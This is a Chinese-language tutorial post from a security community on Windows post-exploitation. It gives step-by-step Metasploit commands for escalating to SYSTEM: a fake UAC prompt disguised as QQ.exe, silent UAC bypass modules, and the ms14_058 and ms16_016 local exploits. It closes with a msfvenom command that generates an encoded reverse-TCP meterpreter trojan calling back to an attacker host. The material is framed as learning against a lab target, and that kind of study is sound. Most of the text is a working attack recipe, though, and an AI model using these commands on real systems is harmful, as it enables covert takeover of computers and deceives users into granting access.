後滲透學習二(UAC提權)

文章來自【位元組脈搏社區】 作者-purplet

UAC提權

當獲得一個低權限的sessions時,這裡是管理員權限,想進一步提升權限,可以使用UAC的方法,是因為此時無法通過getsystem直接提權

首先background讓當前session後台運行 進入下面這個模塊 use Exploit/windows/local/ask set session (此時session對應id) set filename QQ.exe(靶機上將要彈出的uac) exploit 此時在靶機上出現一個exe文件可執行請求提醒,當點擊是後,kali上會獲得一個session

進入這個session

首先輸入sessions查看所有獲取到的session,然後進入對應會話session,命令是sessions -i (對應id)

執行getuid發現仍是管理員權限,但是不要擔心,再次執行getsystem將獲得system權限

但是這樣的方式並不好,用戶很明顯可以看到這樣的請求,稍微有些意識的用戶都會拒絕點擊,因此我們可以嘗試bypass uac的方式,不與用戶直接交互,而metasploit中就正好提供了這樣的模塊

MSF模塊 exploit/windows/local/bypassuac exploit/windows/local/bypassuac_injection exploit/windows/local/bypassuac_vbs 我們這裡就用bypassuac模塊

只需設置session即可

set session (session為對應低權限的id)

我們也可以看到這個模塊可以對32位和64位的電腦都有效

exploit後我們可以收到一個session,再次執行進入,重複上述提權步驟,將得到system權限(這裡不放圖了),而靶機那邊沒有任何反應

至此UACbypass提權成功

附加兩個本地提權漏洞

利用本地提權漏洞 search ms14_058 use exploit/windows/local/ms14_058_track_popup_menu 設置session即可 exploit後得到session,這裡都不用再執行getsystem的命令,直接得到system權限 可在winxp sp3,win2003 sp2,win7 sp1,win8 32位上執行 search ms16_016 use exploit/windows/local/ms16_016_webdav 設置session即可 exploit後得到session,這裡都不用再執行getsystem的命令,直接得到system權限 可在win7 sp1上執行

補充上次遇到的問題:可能是生成的木馬有問題

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' LHOST=攻擊機ip LPORT=4444 -f exe > ma.exe

用以上命令生成的木馬,不會出現上次報錯終止的問題